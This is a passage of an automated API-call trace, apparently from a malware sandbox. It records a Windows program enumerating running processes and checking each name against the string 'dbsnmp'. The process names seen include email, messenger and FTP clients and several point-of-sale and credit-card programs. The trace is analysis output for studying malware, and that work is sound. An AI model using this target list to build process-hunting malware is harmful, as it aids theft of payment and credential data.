lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0092.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.970] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3567938 [0092.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x3567938, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outlook.exe", lpUsedDefaultChar=0x0) returned 12 [0092.970] lstrcpyA (in: lpString1=0x567fabc, lpString2="outlook.exe" | out: lpString1="outlook.exe") returned="outlook.exe" [0092.970] StrStrIA (lpFirst="outlook.exe", lpSrch="dbsnmp") returned 0x0 [0092.970] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0092.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0092.971] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3567a10 [0092.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x3567a10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0092.972] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0092.972] StrStrIA (lpFirst="pidgin.exe", lpSrch="dbsnmp") returned 0x0 [0092.972] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0092.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0092.973] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3567758 [0092.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x3567758, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0092.973] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0092.973] StrStrIA (lpFirst="scriptftp.exe", lpSrch="dbsnmp") returned 0x0 [0092.973] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0092.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.974] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35679f8 [0092.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x35679f8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0092.974] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0092.974] StrStrIA (lpFirst="skype.exe", lpSrch="dbsnmp") returned 0x0 [0092.974] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0092.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.975] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35678f0 [0092.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x35678f0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0092.976] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0092.976] StrStrIA (lpFirst="smartftp.exe", lpSrch="dbsnmp") returned 0x0 [0092.976] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0092.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0092.977] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3567728 [0092.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x3567728, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thunderbird.exe", lpUsedDefaultChar=0x0) returned 16 [0092.977] lstrcpyA (in: lpString1=0x567fabc, lpString2="thunderbird.exe" | out: lpString1="thunderbird.exe") returned="thunderbird.exe" [0092.977] StrStrIA (lpFirst="thunderbird.exe", lpSrch="dbsnmp") returned 0x0 [0092.977] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0092.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.978] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35677e8 [0092.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x35677e8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0092.978] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0092.978] StrStrIA (lpFirst="totalcmd.exe", lpSrch="dbsnmp") returned 0x0 [0092.978] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0092.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.980] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3567770 [0092.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x3567770, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0092.980] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0092.980] StrStrIA (lpFirst="trillian.exe", lpSrch="dbsnmp") returned 0x0 [0092.980] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0092.981] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.981] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3567950 [0092.981] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x3567950, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0092.981] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0092.981] StrStrIA (lpFirst="webdrive.exe", lpSrch="dbsnmp") returned 0x0 [0092.981] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0092.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.982] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35678d8 [0092.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x35678d8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0092.983] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0092.983] StrStrIA (lpFirst="whatsapp.exe", lpSrch="dbsnmp") returned 0x0 [0092.983] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0092.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0092.984] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3567998 [0092.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x3567998, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0092.984] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0092.984] StrStrIA (lpFirst="winscp.exe", lpSrch="dbsnmp") returned 0x0 [0092.984] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0092.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0092.985] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3567350 [0092.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x3567350, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0092.985] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0092.985] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="dbsnmp") returned 0x0 [0092.985] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0092.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0092.987] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x35670d0 [0092.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x35670d0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0092.987] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0092.987] StrStrIA (lpFirst="active-charge.exe", lpSrch="dbsnmp") returned 0x0 [0092.987] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0092.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.988] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3567740 [0092.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x3567740, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0092.988] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0092.988] StrStrIA (lpFirst="accupos.exe", lpSrch="dbsnmp") returned 0x0 [0092.988] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0092.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.990] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3567908 [0092.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x3567908, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0092.990] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0092.990] StrStrIA (lpFirst="afr38.exe", lpSrch="dbsnmp") returned 0x0 [0092.990] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0092.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0092.991] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35678a8 [0092.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x35678a8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0092.991] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0092.991] StrStrIA (lpFirst="aldelo.exe", lpSrch="dbsnmp") returned 0x0 [0092.991] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0092.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0092.992] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x3567920 [0092.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x3567920, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0092.992] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0092.992] StrStrIA (lpFirst="ccv_server.exe", lpSrch="dbsnmp") returned 0x0 [0092.992] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0092.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0092.994] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x3567270 [0092.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x3567270, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0092.994] lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0092.994] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="dbsnmp") returned 0x0 [0092.994] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0092.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0092.995] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x35672d0 [0092.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x35672d0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0092.995] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0092.995] StrStrIA (lpFirst="creditservice.exe", lpSrch="dbsnmp") returned 0x0 [0092.995] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0092.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0092.996] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3567980 [0092.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x3567980, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0092.997] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0092.997] StrStrIA (lpFirst="edcsvr.exe", lpSrch="dbsnmp") returned 0x0 [0092.997] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0092.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0092.998] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x35679b0 [0092.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x35679b0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0092.998] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0092.998] StrStrIA (lpFirst="fpos.exe", lpSrch="dbsnmp") returned 0x0 [0092.998] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0092.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0092.999] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35677d0 [0092.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x35677d0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0092.999] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0092.999] StrStrIA (lpFirst="isspos.exe", lpSrch="dbsnmp") returned 0x0 [0092.999] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0093.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0093.000] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x35673b0 [0093.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x35673b0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0093.000] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0093.000] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="dbsnmp") returned 0x0 [0093.000] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: 